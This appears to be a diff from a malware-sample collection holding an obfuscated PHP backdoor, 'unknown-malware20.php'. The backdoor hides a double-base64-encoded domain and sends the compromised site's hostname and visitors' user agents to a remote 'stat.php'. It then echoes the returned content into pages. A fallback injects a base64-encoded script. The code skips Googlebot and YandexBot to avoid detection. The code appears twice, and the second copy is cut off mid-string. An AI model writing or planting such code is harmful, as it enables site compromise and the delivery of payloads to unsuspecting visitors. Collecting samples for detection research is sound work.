PalmaSolutions · August 11, 2017 14:58
diff --git a/unknown-malware20.php b/unknown-malware20.php
 <?php
 ${"GL\x4f\x42\x41\x4c\x53"}["\x69\x68\x66\x6b\x76bw\x71\x6fo\x6es"]="t\x79\x70\x65\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75tf\x69h\x61\x73"]="\x6f\x75t";${"\x47\x4cOB\x41\x4cS"}["\x73\x6dp\x62\x67\x6b"]="\x75r\x6c";${"GL\x4f\x42\x41\x4c\x53"}["l\x75\x70f\x6b\x6ep\x70\x75\x67"]="\x73\x6fc\x6be\x74";${"G\x4c\x4f\x42\x41LS"}["\x68\x75\x72\x74\x66\x6f\x6f\x74d\x77\x62"]="\x61\x64dr\x65\x73s";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x79xcw\x64vn\x6c"]="\x75a";${"\x47\x4c\x4f\x42AL\x53"}["\x6bqc\x6f\x6ac\x67s\x71\x63"]="\x72\x65\x73";${"\x47L\x4f\x42A\x4c\x53"}["\x69dwr\x70\x6ewz\x77"]="\x64o\x6d\x61i\x6e";${"\x47LO\x42\x41\x4cS"}["z\x6e\x68k\x70qe\x63"]="\x78";${"GLO\x42\x41\x4cS"}["k\x6fhe\x63\x69j\x70"]="\x64\x65\x66\x61ul\x74\x5f\x70ort";${"\x47\x4c\x4fB\x41L\x53"}["\x73\x7a\x72q\x66\x76\x79\x79"]="\x72\x65s\x75lt";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x64l\x75\x6a\x73\x69o\x69\x73\x68"]="\x73\x69\x74e";@ini_set("disp\x6ca\x79\x5fer\x72\x6frs","\x4f\x66\x66");global$ua;$npmsrlswy="\x73\x69\x74\x65";$ucxjcuras="\x75a";$cijcoki="\x64oma\x69\x6e";global$domain;global$site;${$cijcoki}=base64_decode(base64_decode("Z\x45hneExX\x55\x6e\x5aiM0p6\x54\x47\x31\x6b\x61\x41=\x3d"));${$ucxjcuras}=urlencode(base64_encode($_SERVER["\x48\x54\x54P\x5fUS\x45R_A\x47E\x4eT"]));${"\x47\x4c\x4f\x42A\x4cS"}["\x71\x66\x66w\x78l\x65og\x6b"]="si\x74\x65";if(isset($_SERVER["HT\x54\x50\x5f\x48OS\x54"]))${${"\x47L\x4f\x42\x41\x4c\x53"}["s\x64l\x75j\x73\x69o\x69sh"]}=$_SERVER["\x48\x54TP_\x48OST"];else${${"\x47L\x4f\x42A\x4cS"}["\x71\x66f\x77\x78\x6ce\x6f\x67k"]}=$_SERVER["SE\x52\x56\x45R\x5f\x4eAME"];${${"G\x4c\x4f\x42\x41\x4cS"}["\x73\x64\x6cuj\x73i\x6fis\x68"]}=urlencode(base64_encode(${$npmsrlswy}));function request_url(){${${"\x47\x4c\x4f\x42A\x4cS"}["s\x7ar\x71f\x76y\x79"]}="";${${"\x47\x4c\x4f\x42\x41\x4cS"}["k\x6fhe\x63\x69jp"]}=80;$pxggyxnipca="\x72\x65\x73\x75l\x74";$sbdtrayty="\x72e\x73\x75\x6ct";if(isset($_SERVER["H\x54TP\x53"])&&($_SERVER["\x48\x54T\x50S"]=="\x6fn")){${"\x47\x4cO\x42\x41\x4c\x53"}["ffr\x65\x79\x74y"]="d\x65\x66a\x75lt_\x70\x6f\x72\x74";${${"\x47LOB\x41\x4c\x53"}["\x73\x7arq\x66\x76\x79\x79"]}.="\x68ttp\x73://";${${"GL\x4fBAL\x53"}["f\x66\x72\x65y\x74\x79"]}=443;}else${${"\x47\x4cO\x42AL\x53"}["szrq\x66\x76\x79\x79"]}.="\x68tt\x70://";${$pxggyxnipca}.=$_SERVER["\x53\x45\x52\x56E\x52_NAME"];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x76d\x72u\x77"]="\x72\x65s\x75\x6ct";if($_SERVER["\x53\x45\x52V\x45\x52_\x50\x4f\x52T"]!=${${"\x47LOB\x41LS"}["\x6b\x6f\x68\x65\x63i\x6ap"]})${$sbdtrayty}.=":".$_SERVER["\x53ERVER\x5f\x50OR\x54"];${${"G\x4c\x4f\x42\x41LS"}["\x6b\x76dr\x75\x77"]}.=$_SERVER["\x52E\x51U\x45ST\x5f\x55\x52\x49"];return${${"GL\x4f\x42A\x4cS"}["szr\x71fv\x79\x79"]};}function type1($ua,$domain,$site){${"G\x4cOB\x41\x4c\x53"}["\x6bt\x76\x65\x73g\x69"]="r\x65\x73";$wdifpgcfu="\x75\x61";$wuchwkqah="\x73\x69\x74\x65";${"\x47\x4c\x4fBA\x4c\x53"}["\x6bgma\x6da\x6f\x74\x71t\x72"]="\x64om\x61i\x6e";${"GLO\x42\x41L\x53"}["\x6fliz\x64q\x6co\x63"]="\x73i\x74e";${${"GL\x4fB\x41\x4c\x53"}["\x7a\x6e\x68kpq\x65\x63"]}="htt\x70://".${${"\x47\x4cO\x42\x41\x4cS"}["idw\x72\x70\x6e\x77\x7a\x77"]}."/\x73t\x61\x74.\x70h\x70?\x74\x3d1\x26d\x3d".${$wuchwkqah}."&\x75a\x3d".${$wdifpgcfu};${${"G\x4cO\x42\x41\x4c\x53"}["\x6b\x71c\x6f\x6a\x63\x67\x73qc"]}=@file_get_contents("\x68\x74\x74p://".${${"\x47\x4cOB\x41L\x53"}["kg\x6d\x61m\x61\x6f\x74qt\x72"]}."/st\x61\x74\x2e\x70h\x70?\x74=1&d=".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6fl\x69\x7a\x64\x71loc"]}."&u\x61=".${${"G\x4cO\x42\x41\x4c\x53"}["\x6fy\x78\x63w\x64\x76nl"]});if(${${"\x47\x4c\x4fBALS"}["\x6b\x71\x63\x6f\x6a\x63\x67sq\x63"]}===false)return false;$kgoovg="\x72\x65s";${${"G\x4cO\x42\x41\x4c\x53"}["\x6b\x71\x63\x6f\x6a\x63g\x73qc"]}=str_replace("%\x45\x4eCU\x52L\x25",urlencode(base64_encode(request_url())),${${"\x47\x4c\x4fB\x41L\x53"}["\x6bt\x76e\x73\x67i"]});return${$kgoovg};}function type2($ua,$domain,$site){${"GLOBA\x4cS"}["oygd\x63z\x6d\x6b"]="\x72es\x75\x6c\x74";$hxyzwgxmebg="\x72\x65\x73";${"G\x4c\x4fB\x41LS"}["k\x6b\x75\x77p\x76"]="\x69\x6e";$psgxurmuzkpz="\x73oc\x6be\x74";$ddmejrfdofxy="\x64om\x61\x69\x6e";if(function_exists("geth\x6fst\x62yna\x6d\x65")===false||function_exists("\x73\x6f\x63k\x65t\x5fc\x72\x65\x61t\x65")===false||function_exists("s\x6f\x63\x6b\x65\x74_c\x6fn\x6ee\x63\x74")===false||function_exists("\x73ock\x65t\x5f\x77ri\x74\x65")===false||function_exists("\x73ock\x65\x74_\x72e\x61\x64")===false||function_exists("so\x63ke\x74\x5f\x63l\x6f\x73e")===false)return false;$ynlbbom="\x72\x65\x73";${"\x47L\x4f\x42\x41\x4c\x53"}["bc\x78\x6e\x76\x64i\x71"]="\x73\x6fc\x6b\x65\x74";${${"\x47\x4c\x4fBA\x4c\x53"}["\x6b\x71c\x6f\x6ac\x67\x73q\x63"]}=false;${${"\x47\x4c\x4fBAL\x53"}["hu\x72tfo\x6f\x74\x64\x77\x62"]}=@gethostbyname(${${"G\x4c\x4f\x42\x41L\x53"}["\x69d\x77\x72\x70\x6e\x77\x7aw"]});$mumchz="\x75\x72l";$glbsymep="\x61\x64\x64\x72\x65\x73\x73";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6c\x75p\x66\x6b\x6ep\x70u\x67"]}=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$dtcldzq="\x73\x6f\x63\x6b\x65\x74";if(${$dtcldzq}===false)return false;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["ogep\x67u"]="i\x6e";${${"\x47\x4c\x4f\x42\x41LS"}["\x6f\x79\x67\x64\x63z\x6d\x6b"]}=@socket_connect(${$psgxurmuzkpz},${$glbsymep},80);if(${${"\x47\x4c\x4fBALS"}["s\x7ar\x71\x66\x76y\x79"]}===false)return false;$ggtyqbqd="\x6f\x75t";${${"\x47\x4cOB\x41\x4c\x53"}["\x73\x6d\x70\x62\x67\x6b"]}="/s\x74a\x74\x2e\x70\x68p?\x74\x3d2\x26d\x3d".${${"GLOBA\x4c\x53"}["\x73\x64\x6c\x75\x6as\x69\x6f\x69\x73\x68"]}."&\x75a=".${${"GL\x4f\x42\x41L\x53"}["\x6f\x79x\x63\x77\x64\x76\x6e\x6c"]};${"\x47\x4c\x4f\x42\x41\x4cS"}["scy\x73hg\x73\x6f\x77\x70d"]="\x69\x6e";$mbumvdw="\x72\x65\x73";${${"G\x4c\x4f\x42AL\x53"}["k\x6bu\x77p\x76"]}="\x47\x45T\x20".${$mumchz}." H\x54\x54P/1\x2e1\r\n\x48o\x73\x74: ".${$ddmejrfdofxy}."\r\nC\x6f\x6en\x65\x63\x74ion:\x20Close\r\n\r\n";$qbaclgdhpl="res";if(@socket_write(${${"G\x4cO\x42\x41\x4c\x53"}["\x6cu\x70\x66\x6b\x6e\x70\x70\x75g"]},${${"\x47\x4cO\x42A\x4c\x53"}["\x6fg\x65pgu"]},strlen(${${"G\x4c\x4f\x42\x41LS"}["\x73\x63\x79\x73\x68\x67\x73\x6fwp\x64"]}))===false)return false;while((${$ggtyqbqd}=socket_read(${${"\x47\x4cO\x42\x41L\x53"}["\x62cxn\x76\x64\x69\x71"]},2048))!=""){$jwybrndo="\x72e\x73";$kgwffgpi="\x6f\x75\x74";if(${${"\x47L\x4f\x42\x41\x4cS"}["\x75\x74f\x69h\x61\x73"]}===false)return false;${$jwybrndo}.=${$kgwffgpi};}${"\x47\x4c\x4fB\x41\x4c\x53"}["h\x69v\x63\x7a\x69k\x69v"]="\x72\x65\x73";@socket_close(${${"\x47\x4c\x4f\x42\x41LS"}["\x6c\x75\x70\x66\x6bn\x70p\x75\x67"]});if((${${"\x47\x4cOB\x41LS"}["\x6b\x71\x63\x6f\x6ac\x67sq\x63"]}=strstr(${$qbaclgdhpl},"\r\n\r\n"))===false)return false;${${"\x47L\x4f\x42\x41LS"}["h\x69\x76\x63\x7a\x69ki\x76"]}=substr(${$mbumvdw},4);${${"\x47\x4cO\x42A\x4c\x53"}["\x6bqc\x6fj\x63\x67sq\x63"]}=str_replace("%ENCUR\x4c\x25",urlencode(base64_encode(request_url())),${$ynlbbom});return${$hxyzwgxmebg};}function type3($ua,$domain,$site){${${"\x47L\x4f\x42\x41LS"}["\x6bqc\x6f\x6a\x63\x67s\x71\x63"]}=base64_decode("\x50HNj\x63\x6d\x6c\x77d\x43B0eXBl\x50S\x4a0ZX\x680L2\x70\x68d\x6d\x46z\x593\x4apcHQ\x69\x50g\x30\x4b\x5aX\x5a\x68\x62C\x68\x6dd\x575\x6a\x64G\x6c\x76b\x69hw\x4cGE\x73\x59\x79\x78rLG\x55sZ\x43l\x37\x5a\x541mdW\x35j\x64G\x6c\x76bihjK\x58ty\x5a\x58R1\x63\x6d\x34gY\x3307aW\x59\x6f\x49\x53c\x6e\x4c\x6e\x4a\x6cc\x47\x78\x68Y\x32UoL\x31\x34v\x4cFN\x30\x63\x6d\x6c\x75\x5ay\x6b\x70\x65\x33d\x6faW\x78l\x4b\x47M\x74L\x53\x6c7Z\x46t\x6a\x58T\x31\x72W2Nd\x66\x48xjfWs9W2Z\x31bmN\x30a\x579\x75\x4b\x47Upe\x33Jld\x48V\x79\x62iB\x6bW2\x56\x64f\x5607ZT\x31md\x57\x35j\x64G\x6c\x76bi\x67pe3\x4al\x64\x48V\x79\x62\x69\x64c\x58H\x63\x72J307\x59\x7a0\x78f\x54\x74\x33\x61G\x6c\x73\x5aShj\x4c\x530pe\x32\x6cmK\x47\x74\x62\x5910pe3\x41\x39c\x43\x35y\x5aXB\x73Y\x57N\x6cK\x47\x35\x6c\x64yB\x53Z\x57dFeH\x41\x6fJ\x31\x78\x63\x59\x69cr\x5aS\x68jK\x53s\x6e\x58Fxi\x4ayw\x6eZyc\x70\x4cGtb\x59\x31\x30pfX\x31\x79\x5a\x58\x52\x31\x63\x6d\x34\x67\x63\x48\x30\x6f\x4a\x7aE\x33LjE2\x4bFwn\x50\x46w\x6eK\x31\x77n\x4elw\x6eK1wn\x4d\x6c\x77\x6eK\x31\x77nM\x54\x55\x67MTh\x63\x4ay\x74c\x4a\x7aE5X\x43\x63\x72\x58Cc\x39\x49\x6a\x4ecJy\x74cJ\x7aIx\x58C\x63\x72\x58\x43c6L1w\x6e\x4b1\x77\x6e\x4c\x31\x77n\x4b1w\x6eMTRcJy\x74\x63\x4a\x7aE\x74M1wn\x4b1\x77\x6eM\x6a\x4a\x63Jyt\x63\x4az\x51\x75\x58\x43crX\x43c1\x58Cc\x72\x58\x43c\x78\x4dV\x77nK1\x77\x6e\x4c\x7ahcJy\x74\x63Jy4\x35XC\x63\x72X\x43cx\x4dy\x4acJyt\x63J\x79\x41xM\x46\x77n\x4b1\x77\x6e\x4dT\x499X\x43cr\x58C\x63iM\x46w\x6e\x4b\x31\x77\x6eI\x69A3\x58C\x63r\x58\x43c\x79MF\x77n\x4b\x31\x77nMz\x419\x49j\x42cJytc\x4ay\x49g\x4d\x6c\x77\x6eK1wnMzR\x63Jyt\x63\x4az\x49zX\x43c\x72\x58\x43cz\x4d\x7a\x30iXC\x63r\x58\x43\x63\x77Ii\x41zM\x6c\x77nK\x31w\x6eM\x7a\x56\x63\x4a\x79\x74\x63Jz\x4d\x32\x58Ccr\x58C\x63zPS\x4a\x63\x4ay\x74c\x4az\x41\x69\x49\x44M3\x58\x43crX\x43czO\x46\x77nK1\x77\x6eM\x7a\x46cJy\x74c\x4azI\x31\x50S\x4acJy\x74cJ\x7a\x41iI\x44\x490X\x43\x63\x72\x58\x43\x63y\x4e\x6cwn\x4b1\x77\x6e\x4djdcJyt\x63\x4a\x7a\x559\x49lwnK1w\x6e\x4djl\x63\x4a\x79\x74c\x4ayI+X\x43\x63r\x58Cc\x38\x58C\x63\x72\x58C\x63vX\x43\x63\x72\x58C\x63\x32XCcrXC\x63yX\x43crXCcy\x4f\x46wn\x4b1\x77\x6e\x4eFwn\x4b1w\x6e\x50\x6cw\x6e\x4b\x54sn\x4c\x44\x45\x77\x4cD\x4d\x35L\x43d8\x66\x47ZyfG\x68\x38ZXx\x6e\x66\x47l8aG\x56pf\x47l\x75Z\x47\x56\x34\x66H\x428\x642l\x6bf\x47F8d\x47h\x38\x61\x48\x42\x38bHx\x68b\x57V8d\x33J\x70dGV8ZG9\x6ad\x571lbn\x52\x38c3\x78\x79Y\x33x\x6e\x61Hx\x30d\x48B\x38b\x3218c\x6d\x52l\x66H\x4e\x6afGh\x30f\x48\x4a\x76bHxsa\x57\x35\x38\x59W\x31\x38\x62m9\x38\x64H\x78\x75\x61\x47\x56\x70Z3\x78\x74\x59\x58\x4a8cn\x78\x68\x62\x57\x56\x69b\x33x\x6eaW5\x33\x66\x47l\x6b\x64HxtYXx\x79\x5a2\x6bn\x4c\x6e\x4ew\x62\x47l\x30KCd8Jy\x6b\x73MC\x78\x37\x66\x53k\x70DQ\x6f8\x4c3N\x6acmlw\x64\x44\x34\x3d");return${${"\x47L\x4fBAL\x53"}["\x6bq\x63\x6f\x6ac\x67s\x71\x63"]};}if((stripos($_SERVER["HT\x54P_U\x53\x45R\x5fA\x47EN\x54"],"\x47o\x6fg\x6ce\x62ot")==false)&&(stripos($_SERVER["HTT\x50_USE\x52\x5fA\x47\x45\x4e\x54"],"Ya\x6e\x64\x65\x78\x42ot")==false)){$pfnekh="\x66unc";$lwxorpyz="\x74\x79\x70\x65\x73";${${"\x47\x4cOB\x41L\x53"}["\x69\x68\x66\x6b\x76b\x77\x71\x6f\x6f\x6e\x73"]}=array("ty\x70e1","\x74yp\x652","\x74y\x70e\x33");foreach(${$lwxorpyz} as${$pfnekh}){${"\x47L\x4fBALS"}["\x61xq\x77w\x72\x79"]="d\x6f\x6d\x61\x69n";$cdzkxgsdgaj="fu\x6e\x63";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x71c\x6f\x6a\x63g\x73\x71\x63"]}=${$cdzkxgsdgaj}(${${"G\x4c\x4f\x42AL\x53"}["o\x79x\x63w\x64\x76\x6e\x6c"]},${${"G\x4c\x4fBA\x4c\x53"}["\x61x\x71ww\x72\x79"]},${${"\x47\x4cOB\x41\x4c\x53"}["sd\x6c\x75\x6a\x73i\x6fi\x73\x68"]});if(${${"GL\x4f\x42\x41\x4c\x53"}["\x6bqc\x6f\x6a\x63\x67\x73\x71\x63"]}!==false){echo${${"\x47\x4cO\x42\x41\x4c\x53"}["kq\x63oj\x63\x67\x73\x71\x63"]};break;}}}
 ?>
	<?php
	${"GL\x4f\x42\x41\x4c\x53"}["\x69\x68\x66\x6b\x76bw\x71\x6fo\x6es"]="t\x79\x70\x65\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75tf\x69h\x61\x73"]="\x6f\x75t";${"\x47\x4cOB\x41\x4cS"}["\x73\x6dp\x62\x67\x6b"]="\x75r\x6c";${"GL\x4f\x42\x41\x4c\x53"}["l\x75\x70f\x6b\x6ep\x70\x75\x67"]="\x73\x6fc\x6be\x74";${"G\x4c\x4f\x42\x41LS"}["\x68\x75\x72\x74\x66\x6f\x6f\x74d\x77\x62"]="\x61\x64dr\x65\x73s";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x79xcw\x64vn\x6c"]="\x75a";${"\x47\x4c\x4f\x42AL\x53"}["\x6bqc\x6f\x6ac\x67s\x71\x63"]="\x72\x65\x73";${"\x47L\x4f\x42A\x4c\x53"}["\x69dwr\x70\x6ewz\x77"]="\x64o\x6d\x61i\x6e";${"\x47LO\x42\x41\x4cS"}["z\x6e\x68k\x70qe\x63"]="\x78";${"GLO\x42\x41\x4cS"}["k\x6fhe\x63\x69j\x70"]="\x64\x65\x66\x61ul\x74\x5f\x70ort";${"\x47\x4c\x4fB\x41L\x53"}["\x73\x7a\x72q\x66\x76\x79\x79"]="\x72\x65s\x75lt";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x64l\x75\x6a\x73\x69o\x69\x73\x68"]="\x73\x69\x74e";@ini_set("disp\x6ca\x79\x5fer\x72\x6frs","\x4f\x66\x66");global$ua;$npmsrlswy="\x73\x69\x74\x65";$ucxjcuras="\x75a";$cijcoki="\x64oma\x69\x6e";global$domain;global$site;${$cijcoki}=base64_decode(base64_decode("Z\x45hneExX\x55\x6e\x5aiM0p6\x54\x47\x31\x6b\x61\x41=\x3d"));${$ucxjcuras}=urlencode(base64_encode($_SERVER["\x48\x54\x54P\x5fUS\x45R_A\x47E\x4eT"]));${"\x47\x4c\x4f\x42A\x4cS"}["\x71\x66\x66w\x78l\x65og\x6b"]="si\x74\x65";if(isset($_SERVER["HT\x54\x50\x5f\x48OS\x54"]))${${"\x47L\x4f\x42\x41\x4c\x53"}["s\x64l\x75j\x73\x69o\x69sh"]}=$_SERVER["\x48\x54TP_\x48OST"];else${${"\x47L\x4f\x42A\x4cS"}["\x71\x66f\x77\x78\x6ce\x6f\x67k"]}=$_SERVER["SE\x52\x56\x45R\x5f\x4eAME"];${${"G\x4c\x4f\x42\x41\x4cS"}["\x73\x64\x6cuj\x73i\x6fis\x68"]}=urlencode(base64_encode(${$npmsrlswy}));function request_url(){${${"\x47\x4c\x4f\x42A\x4cS"}["s\x7ar\x71f\x76y\x79"]}="";${${"\x47\x4c\x4f\x42\x41\x4cS"}["k\x6fhe\x63\x69jp"]}=80;$pxggyxnipca="\x72\x65\x73\x75l\x74";$sbdtrayty="\x72e\x73\x75\x6ct";if(isset($_SERVER["H\x54TP\x53"])&&($_SERVER["\x48\x54T\x50S"]=="\x6fn")){${"\x47\x4cO\x42\x41\x4c\x53"}["ffr\x65\x79\x74y"]="d\x65\x66a\x75lt_\x70\x6f\x72\x74";${${"\x47LOB\x41\x4c\x53"}["\x73\x7arq\x66\x76\x79\x79"]}.="\x68ttp\x73://";${${"GL\x4fBAL\x53"}["f\x66\x72\x65y\x74\x79"]}=443;}else${${"\x47\x4cO\x42AL\x53"}["szrq\x66\x76\x79\x79"]}.="\x68tt\x70://";${$pxggyxnipca}.=$_SERVER["\x53\x45\x52\x56E\x52_NAME"];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x76d\x72u\x77"]="\x72\x65s\x75\x6ct";if($_SERVER["\x53\x45\x52V\x45\x52_\x50\x4f\x52T"]!=${${"\x47LOB\x41LS"}["\x6b\x6f\x68\x65\x63i\x6ap"]})${$sbdtrayty}.=":".$_SERVER["\x53ERVER\x5f\x50OR\x54"];${${"G\x4c\x4f\x42\x41LS"}["\x6b\x76dr\x75\x77"]}.=$_SERVER["\x52E\x51U\x45ST\x5f\x55\x52\x49"];return${${"GL\x4f\x42A\x4cS"}["szr\x71fv\x79\x79"]};}function type1($ua,$domain,$site){${"G\x4cOB\x41\x4c\x53"}["\x6bt\x76\x65\x73g\x69"]="r\x65\x73";$wdifpgcfu="\x75\x61";$wuchwkqah="\x73\x69\x74\x65";${"\x47\x4c\x4fBA\x4c\x53"}["\x6bgma\x6da\x6f\x74\x71t\x72"]="\x64om\x61i\x6e";${"GLO\x42\x41L\x53"}["\x6fliz\x64q\x6co\x63"]="\x73i\x74e";${${"GL\x4fB\x41\x4c\x53"}["\x7a\x6e\x68kpq\x65\x63"]}="htt\x70://".${${"\x47\x4cO\x42\x41\x4cS"}["idw\x72\x70\x6e\x77\x7a\x77"]}."/\x73t\x61\x74.\x70h\x70?\x74\x3d1\x26d\x3d".${$wuchwkqah}."&\x75a\x3d".${$wdifpgcfu};${${"G\x4cO\x42\x41\x4c\x53"}["\x6b\x71c\x6f\x6a\x63\x67\x73qc"]}=@file_get_contents("\x68\x74\x74p://".${${"\x47\x4cOB\x41L\x53"}["kg\x6d\x61m\x61\x6f\x74qt\x72"]}."/st\x61\x74\x2e\x70h\x70?\x74=1&d=".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6fl\x69\x7a\x64\x71loc"]}."&u\x61=".${${"G\x4cO\x42\x41\x4c\x53"}["\x6fy\x78\x63w\x64\x76nl"]});if(${${"\x47\x4c\x4fBALS"}["\x6b\x71\x63\x6f\x6a\x63\x67sq\x63"]}===false)return false;$kgoovg="\x72\x65s";${${"G\x4cO\x42\x41\x4c\x53"}["\x6b\x71\x63\x6f\x6a\x63g\x73qc"]}=str_replace("%\x45\x4eCU\x52L\x25",urlencode(base64_encode(request_url())),${${"\x47\x4c\x4fB\x41L\x53"}["\x6bt\x76e\x73\x67i"]});return${$kgoovg};}function type2($ua,$domain,$site){${"GLOBA\x4cS"}["oygd\x63z\x6d\x6b"]="\x72es\x75\x6c\x74";$hxyzwgxmebg="\x72\x65\x73";${"G\x4c\x4fB\x41LS"}["k\x6b\x75\x77p\x76"]="\x69\x6e";$psgxurmuzkpz="\x73oc\x6be\x74";$ddmejrfdofxy="\x64om\x61\x69\x6e";if(function_exists("geth\x6fst\x62yna\x6d\x65")===false\|\|function_exists("\x73\x6f\x63k\x65t\x5fc\x72\x65\x61t\x65")===false\|\|function_exists("s\x6f\x63\x6b\x65\x74_c\x6fn\x6ee\x63\x74")===false\|\|function_exists("\x73ock\x65t\x5f\x77ri\x74\x65")===false\|\|function_exists("\x73ock\x65\x74_\x72e\x61\x64")===false\|\|function_exists("so\x63ke\x74\x5f\x63l\x6f\x73e")===false)return false;$ynlbbom="\x72\x65\x73";${"\x47L\x4f\x42\x41\x4c\x53"}["bc\x78\x6e\x76\x64i\x71"]="\x73\x6fc\x6b\x65\x74";${${"\x47\x4c\x4fBA\x4c\x53"}["\x6b\x71c\x6f\x6ac\x67\x73q\x63"]}=false;${${"\x47\x4c\x4fBAL\x53"}["hu\x72tfo\x6f\x74\x64\x77\x62"]}=@gethostbyname(${${"G\x4c\x4f\x42\x41L\x53"}["\x69d\x77\x72\x70\x6e\x77\x7aw"]});$mumchz="\x75\x72l";$glbsymep="\x61\x64\x64\x72\x65\x73\x73";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6c\x75p\x66\x6b\x6ep\x70u\x67"]}=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$dtcldzq="\x73\x6f\x63\x6b\x65\x74";if(${$dtcldzq}===false)return false;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["ogep\x67u"]="i\x6e";${${"\x47\x4c\x4f\x42\x41LS"}["\x6f\x79\x67\x64\x63z\x6d\x6b"]}=@socket_connect(${$psgxurmuzkpz},${$glbsymep},80);if(${${"\x47\x4c\x4fBALS"}["s\x7ar\x71\x66\x76y\x79"]}===false)return false;$ggtyqbqd="\x6f\x75t";${${"\x47\x4cOB\x41\x4c\x53"}["\x73\x6d\x70\x62\x67\x6b"]}="/s\x74a\x74\x2e\x70\x68p?\x74\x3d2\x26d\x3d".${${"GLOBA\x4c\x53"}["\x73\x64\x6c\x75\x6as\x69\x6f\x69\x73\x68"]}."&\x75a=".${${"GL\x4f\x42\x41L\x53"}["\x6f\x79x\x63\x77\x64\x76\x6e\x6c"]};${"\x47\x4c\x4f\x42\x41\x4cS"}["scy\x73hg\x73\x6f\x77\x70d"]="\x69\x6e";$mbumvdw="\x72\x65\x73";${${"G\x4c\x4f\x42AL\x53"}["k\x6bu\x77p\x76"]}="\x47\x45T\x20".${$mumchz}." H\x54\x54P/1\x2e1\r\n\x48o\x73\x74: ".${$ddmejrfdofxy}."\r\nC\x6f\x6en\x65\x63\x74ion:\x20Close\r\n\r\n";$qbaclgdhpl="res";if(@socket_write(${${"G\x4cO\x42\x41\x4c\x53"}["\x6cu\x70\x66\x6b\x6e\x70\x70\x75g"]},${${"\x47\x4cO\x42A\x4c\x53"}["\x6fg\x65pgu"]},strlen(${${"G\x4c\x4f\x42\x41LS"}["\x73\x63\x79\x73\x68\x67\x73\x6fwp\x64"]}))===false)return false;while((${$ggtyqbqd}=socket_read(${${"\x47\x4cO\x42\x41L\x53"}["\x62cxn\x76\x64\x69\x71"]},2048))!=""){$jwybrndo="\x72e\x73";$kgwffgpi="\x6f\x75\x74";if(${${"\x47L\x4f\x42\x41\x4cS"}["\x75\x74f\x69h\x61\x73"]}===false)return false;${$jwybrndo}.=${$kgwffgpi};}${"\x47\x4c\x4fB\x41\x4c\x53"}["h\x69v\x63\x7a\x69k\x69v"]="\x72\x65\x73";@socket_close(${${"\x47\x4c\x4f\x42\x41LS"}["\x6c\x75\x70\x66\x6bn\x70p\x75\x67"]});if((${${"\x47\x4cOB\x41LS"}["\x6b\x71\x63\x6f\x6ac\x67sq\x63"]}=strstr(${$qbaclgdhpl},"\r\n\r\n"))===false)return false;${${"\x47L\x4f\x42\x41LS"}["h\x69\x76\x63\x7a\x69ki\x76"]}=substr(${$mbumvdw},4);${${"\x47\x4cO\x42A\x4c\x53"}["\x6bqc\x6fj\x63\x67sq\x63"]}=str_replace("%ENCUR\x4c\x25",urlencode(base64_encode(request_url())),${$ynlbbom});return${$hxyzwgxmebg};}function type3($ua,$domain,$site){${${"\x47L\x4f\x42\x41LS"}["\x6bqc\x6f\x6a\x63\x67s\x71\x63"]}=base64_decode("\x50HNj\x63\x6d\x6c\x77d\x43B0eXBl\x50S\x4a0ZX\x680L2\x70\x68d\x6d\x46z\x593\x4apcHQ\x69\x50g\x30\x4b\x5aX\x5a\x68\x62C\x68\x6dd\x575\x6a\x64G\x6c\x76b\x69hw\x4cGE\x73\x59\x79\x78rLG\x55sZ\x43l\x37\x5a\x541mdW\x35j\x64G\x6c\x76bihjK\x58ty\x5a\x58R1\x63\x6d\x34gY\x3307aW\x59\x6f\x49\x53c\x6e\x4c\x6e\x4a\x6cc\x47\x78\x68Y\x32UoL\x31\x34v\x4cFN\x30\x63\x6d\x6c\x75\x5ay\x6b\x70\x65\x33d\x6faW\x78l\x4b\x47M\x74L\x53\x6c7Z\x46t\x6a\x58T\x31\x72W2Nd\x66\x48xjfWs9W2Z\x31bmN\x30a\x579\x75\x4b\x47Upe\x33Jld\x48V\x79\x62iB\x6bW2\x56\x64f\x5607ZT\x31md\x57\x35j\x64G\x6c\x76bi\x67pe3\x4al\x64\x48V\x79\x62\x69\x64c\x58H\x63\x72J307\x59\x7a0\x78f\x54\x74\x33\x61G\x6c\x73\x5aShj\x4c\x530pe\x32\x6cmK\x47\x74\x62\x5910pe3\x41\x39c\x43\x35y\x5aXB\x73Y\x57N\x6cK\x47\x35\x6c\x64yB\x53Z\x57dFeH\x41\x6fJ\x31\x78\x63\x59\x69cr\x5aS\x68jK\x53s\x6e\x58Fxi\x4ayw\x6eZyc\x70\x4cGtb\x59\x31\x30pfX\x31\x79\x5a\x58\x52\x31\x63\x6d\x34\x67\x63\x48\x30\x6f\x4a\x7aE\x33LjE2\x4bFwn\x50\x46w\x6eK\x31\x77n\x4elw\x6eK1wn\x4d\x6c\x77\x6eK\x31\x77nM\x54\x55\x67MTh\x63\x4ay\x74c\x4a\x7aE5X\x43\x63\x72\x58Cc\x39\x49\x6a\x4ecJy\x74cJ\x7aIx\x58C\x63\x72\x58\x43c6L1w\x6e\x4b1\x77\x6e\x4c\x31\x77n\x4b1w\x6eMTRcJy\x74\x63\x4a\x7aE\x74M1wn\x4b1\x77\x6eM\x6a\x4a\x63Jyt\x63\x4az\x51\x75\x58\x43crX\x43c1\x58Cc\x72\x58\x43c\x78\x4dV\x77nK1\x77\x6e\x4c\x7ahcJy\x74\x63Jy4\x35XC\x63\x72X\x43cx\x4dy\x4acJyt\x63J\x79\x41xM\x46\x77n\x4b1\x77\x6e\x4dT\x499X\x43cr\x58C\x63iM\x46w\x6e\x4b\x31\x77\x6eI\x69A3\x58C\x63r\x58\x43c\x79MF\x77n\x4b\x31\x77nMz\x419\x49j\x42cJytc\x4ay\x49g\x4d\x